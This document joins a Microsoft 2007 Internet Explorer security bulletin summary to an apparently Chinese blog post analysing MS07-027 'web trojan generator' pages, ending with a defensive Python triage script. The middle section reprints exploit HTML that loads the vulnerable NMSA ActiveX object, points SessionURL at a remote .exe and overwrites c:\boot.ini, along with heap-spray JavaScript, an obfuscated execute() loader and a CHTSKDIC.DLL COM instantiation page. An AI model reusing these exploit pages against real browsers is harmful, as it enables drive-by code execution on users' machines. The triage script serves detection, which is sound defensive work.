Cumulative Security Update for Internet Explorer (931768)
Published: May 8, 2007 | Updated: May 16, 2007
Version: 1.2
Summary
Who should read this document: Customers who use Microsoft Windows
Impact of Vulnerability: Remote Code Execution
Maximum Severity Rating: Critical
Recommendation: Customers should apply the update immediately
Security Update Replacement: This bulletin replaces several prior security updates. See the Frequently Asked Questions (FAQ) section of this bulletin for details.
Caveats: Microsoft Knowledge Base Article 931768 documents the currently known issues that customers may experience when installing this security update. The article also documents recommended solutions for these issues. For more information, see Microsoft Knowledge Base Article 931768.
Tested Software and Security Update Download Locations:
Affected Software:
• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 2
• Microsoft Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2
• Microsoft Windows Server 2003 Service Pack 1 and Microsoft Windows Server 2003 Service Pack 2
• Microsoft Windows Server 2003 SP1 for Itanium-based Systems and Microsoft Windows Server 2003 SP2 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition Service Pack 1 and Microsoft Windows Server 2003 x64 Edition Service Pack 2
• Windows Vista
• Windows Vista x64 Edition
Tested Microsoft Windows Components:
Affected Components:
• Microsoft Internet Explorer 5.01 Service Pack 4 on Windows 2000 Service Pack 4 — Download the update
• Microsoft Internet Explorer 6 Service Pack 1 when installed on Windows 2000 Service Pack 4 — Download the update
• Microsoft Internet Explorer 6 for Windows XP Service Pack 2 — Download the update
• Microsoft Internet Explorer 6 for Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2 — Download the update
• Microsoft Internet Explorer 6 for Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2 — Download the update
• Microsoft Internet Explorer 6 for Windows Server 2003 SP1 for Itanium-based Systems and Windows Server 2003 SP2 for Itanium-based Systems — Download the update
• Microsoft Internet Explorer 6 for Windows Server 2003 x64 Edition Service Pack 1 and Windows Server 2003 x64 Edition Service Pack 2 — Download the update
• Microsoft Internet Explorer 7 for Windows XP Service Pack 2 — Download the update
• Windows Internet Explorer 7 for Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2 — Download the update
• Windows Internet Explorer 7 for Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2 — Download the update
• Windows Internet Explorer 7 for Windows Server 2003 SP1 for Itanium-based Systems and Windows Server 2003 SP2 for Itanium-based Systems — Download the update
• Windows Internet Explorer 7 for Windows Server 2003 x64 Edition Service Pack 1 and Windows Server 2003 x64 Edition Service Pack 2 — Download the update
• Windows Internet Explorer 7 in Windows Vista — Download the update
• Windows Internet Explorer 7 in Windows Vista x64 Edition — Download the update
-----------------------
Analysis of web pages weaponising the MS07027 vulnerability
2007-05-25 19:11
On May 16 Microsoft released the patch for this Internet Explorer vulnerability. The vulnerability does not seem to be widespread, but tools that exploit MS07027 have already appeared online. I know of two: the "MS07027 web trojan generator" and the "latest MS07027 + AV-evading ANI super high-efficiency web trojan generator".
1. The MS07027 web trojan generator produces a file named MS07027.html with the following content:
<html>
<title> MS07-027 Oday </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">
</OBJECT>
<script language="vbscript">
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://127.0.0.1/0.exe"
target.SaveAs "c:\boot.ini"
<script src="inject.js"></script>
</script>
</body>
</html>
I first saw this code on my friend Hysia's blog, but this MS07027 web trojan generator is obviously a fake! It does not ship the shellcode at all! The shellcode should be in the inject.js file, but no such js file is generated, only MS07027.html! And the full shellcode has not been published online either... only a part of it:
function PrepMem()
{
//Standard Heap Spray Code
var heapSprayToAddress = 0x06060606;
var payLoadCode = HeapRepairCode + Shellcode;
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
}
function GetSystemVersion()
{
//Simple Detecting of OS version out of Jscript version:
var ver = "";
ver += ScriptEngineMajorVersion();
ver += ScriptEngineMinorVersion();
ver += ScriptEngineBuildVersion();
if ( ver<568820 ){ return("preSP2"); }
else if ( ver<575730 ){ return("SP2"); }
else return (0);
}
2. The other one, the so-called "latest MS07027 + AV-evading ANI super high-efficiency web trojan generator", produces a file named fyms07027.htm. My machine did not have this patch installed, so I set up IIS to test it. There was a reaction: the first time the machine crashed and rebooted outright... On further testing I found that the code runs far too slowly; I waited a long time and the expected result never appeared, so I stopped testing. The source of fyms07027.htm is as follows:
<html>
<body>
<SCRIPT language="javascript">
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
t="..."  ' (the long comma-separated decimal string that encodes the script is omitted here)
i=t
execute(rechange(I))
</SCRIPT>
<object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object>
<!-- Note: this object is not the one for the MS07027 vulnerability -->
Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit
by the FrSIRT < http://www.fy.com >
Solution - http://www.fy.com/</body><script>location.reload();</script>
</html>
After fully decoding it, I found strange garbage. I don't know why... Anyone interested can decode it themselves, or run the code and see. I suppose it is these problems that limit exploitation of the MS07027 vulnerability. Having looked at many exploitable vulnerabilities, MS07017 and MS06014 are still the classics!
---------------
Today I finally got it working in the debugger. The effect is basically the same as 06014, and it gets past all antivirus software. I am only releasing part of the debug code, because I am afraid of causing chaos, so for now only part of it is published!
<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">
</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://192.168.1.168/1.exe"
target.SaveAs "c:\boot.ini"
<script src="inject.js"></script>
</script>
</body>
</html>
Below is part of the shellcode
===========///ms07-027 exploit ///================
function PrepMem()
{
//Standard Heap Spray Code
var heapSprayToAddress = 0x06060606;
var payLoadCode = HeapRepairCode + Shellcode;
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
}
function GetSystemVersion()
{
//Simple Detecting of OS version out of Jscript version:
var ver = "";
ver += ScriptEngineMajorVersion();
ver += ScriptEngineMinorVersion();
ver += ScriptEngineBuildVersion();
if ( ver<568820 ){ return("preSP2"); }
else if ( ver<575730 ){ return("SP2"); }
else return (0);
}
I will make a demo video for everyone; this is only part of the code!
-------------------------
Test method:
Warning
The following program (method) may be offensive in nature and is intended solely for security research and teaching. Use at your own risk!
=============== CHTSKDIC.DLL.htm start ================
<!--
// Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability
// tested XP SP2 CN
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {BE4191FB-59EF-4825-AEFC-109727951E42}
// Info: ImeSingleKanjiDict// ProgID: ID2
// InprocServer32: C:\WINDOWS\IME\CHTIME\APPLETS\CHTSKDIC.DLL
!-->
<html><body>
<object classid="CLSID:{BE4191FB-59EF-4825-AEFC-109727951E42}" ></object>
</body></html>
=============== CHTSKDIC.DLL.htm end ==================
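An analyst-side triage script for the three pages above, added here as an example and not code from this post: it peels off the decimal Chr() obfuscation layer that fyms07027.htm feeds into rechange()/execute(), lists the ActiveX CLSIDs a page instantiates (labelling the three named in this post), and flags the heap-spray and SaveAs indicators seen in MS07027.html and the decoded script. The sample page, its harmless encoded snippet and the KNOWN_CLSIDS labels are constructed for the example.

```python
import re

# CLSIDs named in this post (from the page): the MS07-027 NMSA object, javaprxy.dll, CHTSKDIC.DLL
KNOWN_CLSIDS = {
    "d4fe6227-1288-11d0-9097-00aa004254a0": "NMSA Session Description object (mdsauth.dll, MS07-027)",
    "03d9f3f2-b0e3-11d2-b081-006008039bf0": "javaprxy.dll COM object",
    "be4191fb-59ef-4825-aefc-109727951e42": "CHTSKDIC.DLL ImeSingleKanjiDict",
}
CLSID_RE = re.compile(r"clsid:\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?", re.I)
# A quoted run of 16+ comma-separated decimals is the rechange() obfuscation layer
DEC_LIST_RE = re.compile(r'"((?:\d{1,3},){16,}\d{1,3})"')
# Heap-spray and file-write indicators drawn from the pages in this post
INDICATORS = {
    "nop_sled": re.compile(r"%u9090", re.I),
    "unescape_unicode": re.compile(r"unescape\s*\(\s*[\"']%u", re.I),
    "array_fill_loop": re.compile(r"memory\s*\[\s*\w+\s*\]\s*=", re.I),
    "saveas_call": re.compile(r"\.SaveAs\b", re.I),
}

def decode_decimal_layer(text):
    """Undo the rechange() trick: every comma-separated decimal becomes one Chr() code."""
    layers = []
    for m in DEC_LIST_RE.finditer(text):
        codes = [int(c) for c in m.group(1).split(",")]
        if all(c < 256 for c in codes):
            layers.append("".join(chr(c) for c in codes))
    return layers

def analyse(html):
    """Return the CLSIDs instantiated and the indicators found in raw and decoded text."""
    found = {"clsids": {}, "indicators": set(), "decoded_layers": 0}
    for m in CLSID_RE.finditer(html):
        cid = m.group(1).lower()
        found["clsids"][cid] = KNOWN_CLSIDS.get(cid, "unknown")
    layers = decode_decimal_layer(html)
    found["decoded_layers"] = len(layers)
    for text in [html] + layers:  # scan the page itself and each decoded layer
        for name, rx in INDICATORS.items():
            if rx.search(text):
                found["indicators"].add(name)
    return found

# Constructed sample (not the real payload): a harmless heap-spray-shaped snippet encoded the
# way fyms07027.htm encodes its script, plus two of the CLSIDs named in this post
SAMPLE_INNER = 'shellcode = unescape("%u9090%u9090"); memory = new Array(); for (i=0;i<750;i++) memory[i] = block + shellcode;'
SAMPLE_HTML = (
    '<object id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"></object>\n'
    '<script language="vbscript">\nt="' + ",".join(str(ord(ch)) for ch in SAMPLE_INNER)
    + '"\nexecute(rechange(t))\n</script>\n'
    '<object classid="CLSID:{BE4191FB-59EF-4825-AEFC-109727951E42}"></object>\n'
)
```

Scanning only the raw HTML would miss every heap-spray indicator in the sample; they only surface after the decimal layer is decoded, which is the point of running the indicators over each decoded layer as well.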